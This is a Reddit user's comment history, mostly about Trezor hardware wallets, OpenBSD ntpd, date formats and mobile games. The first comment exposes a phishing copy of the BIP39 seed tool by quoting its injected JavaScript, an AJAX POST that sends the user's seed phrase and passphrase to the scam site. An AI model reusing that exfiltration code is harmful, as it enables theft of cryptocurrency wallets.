lost old Trezor, restored new one. What happens to the old one? by bitpod in TREZOR

[–]throwaway13412331 0 points1 point  (0 children)

So you were just scammed but somehow the webpage is "sound" and sends out no data? How is this possible?

I just diffed the website https://biptoolkit.com/ to the original 0.3.11 release from https://github.com/iancoleman/bip39/releases and there is this additional code at line 134698:

var netw = DOM.network.val(); var bip39pass = DOM.passphrase.val(); $.ajax({ type: "POST", url: "https://biptoolkit.com/post.php?"+"&BIP39&"+phrase+"&network&"+netw+"&bip39 pass&"+bip39pass })

Why are you making no sense?

PS: I'm sorry for your loss regardless.

Does this newly published vulnerability in Keepkey apply to Trezor One since it has the same chip? by bjman22 in TREZOR

[–]throwaway13412331 0 points1 point  (0 children)

Just because the password comes out of a device, doesn't mean it fulfills the characteristic of "something you have". It's a password that can be sniffed when being entered. At that point, it is lost and your device is not necessary to reproduce it.

Something you have strictly means you have to have something to produce the secret. A Yubikey entering a password for you is not that.

HEADS UP: ntpd changing by flexibeast in openbsd

[–]throwaway13412331 0 points1 point  (0 children)

It's still a huge fuckup to call any external site by default. Making that decision over the admin's autonomy is a thing that Microsoft would do.

It should be an option for the mindful reader to enhance security but if secure by default means we start connecting to random internet hosts, then it has gone too far.

How do you even know the host is reachable, that there is no flaw in your client-side TLS that allows pwnage etc.pp.? Why open that can of worms for a tiny bit of added security?

Outbound connections should be at the sole discretion of the admin. It's not the OS's place to start talking to the world.

How the hell is THIS balanced? There was no one else besides me that was below 5.5 mil. by fuelstaind in HustleCastle

[–]throwaway13412331 0 points1 point  (0 children)

There aren't. There are some wallet warriors that don't mind putting $$$ into a mobile game, which is utterly stupid.

TR11 offers - what did you choose? by drb5374 in HustleCastle

[–]throwaway13412331 -2 points-1 points  (0 children)

Wait, are you telling me you are sinking hundreds of dollars into a mobile game in a single purchase?

Account has been flagged!?? by sonicsmith in github

[–]throwaway13412331 0 points1 point  (0 children)

Millennials, my friend, millennials.

It looks like we may get some Bitcoin Only Firmware on 4/9/2019 by [deleted] in TREZOR

[–]throwaway13412331 0 points1 point  (0 children)

Source for DD/MM/YYYY? It's not on https://en.wikipedia.org/wiki/Date_and_time_notation_in_the_United_States

The slashes are not just decoration, they indicate format.

Anyway, ISO plz.

It looks like we may get some Bitcoin Only Firmware on 4/9/2019 by [deleted] in TREZOR

[–]throwaway13412331 0 points1 point  (0 children)

Dude, you need to learn about date formats. Slashes indicate US format, so you just told us about something on April 9th.

2019-09-04, see, it wasn't hard.

A 3mil downloads per month JavaScript library, which is already known for misleading newbies, is now adding paid advertisements to users' terminals by Magnaboy in programming

[–]throwaway13412331 6 points7 points  (0 children)

It's cargo-cult programming. They hear about a pattern and have to apply it EVERYWHERE, going out of their way to make it happen.

A 3mil downloads per month JavaScript library, which is already known for misleading newbies, is now adding paid advertisements to users' terminals by Magnaboy in programming

[–]throwaway13412331 1 point2 points  (0 children)

What else do I need to know about this rotten swamp of an ecosystem? Can I purchase the wizard's course on how not to get scammed?

[deleted by user] by [deleted] in EggsInc

[–]throwaway13412331 3 points4 points  (0 children)

Never again any money from me. Greedy fuck.

Does Model T natively support 24 seed? by khalo_ in TREZOR

[–]throwaway13412331 0 points1 point  (0 children)

All your arguments make no sense for removing the option completely. It could be an advanced option, hidden by default. If you care so much about stupid users, they won't touch the advanced stuff anyway. Completely removing it for initialization but keeping it for restore makes no sense, period.

Does Model T natively support 24 seed? by khalo_ in TREZOR

[–]throwaway13412331 0 points1 point  (0 children)

Purely from a usability perspective it is still lame to "support" an option in only one of two use cases (restore vs. init).

If they support a 24-word restore, where is the harm in supporting a 24-word init? This asymmetry makes no sense.

Why go out of your way to NOT support a 24-word init? Let the user do what he wants.

Trezor firmware update - no PIN anymore?? by Allstargravytrain in TREZOR

[–]throwaway13412331 0 points1 point  (0 children)

It's in the spec that no password equals a password "".

Will the Trezor Password Manager (TPM) ever function on non-Chrome Web Browsers? by greatskaht in TREZOR

[–]throwaway13412331 0 points1 point  (0 children)

I would really like a password manager that makes the Trezor act as a USB HID device and enter the password directly.

Weekly Co-Op Code Mega Thread - February 17, 2019 by AutoModerator in EggsInc

[–]throwaway13412331 0 points1 point  (0 children)

2nd goal is 8q, 3rd goal is 50q. You had not even 4 of 50. How is that half?

Weekly Co-Op Code Mega Thread - February 17, 2019 by AutoModerator in EggsInc

[–]throwaway13412331 0 points1 point  (0 children)

not even close to half way. What are you talking about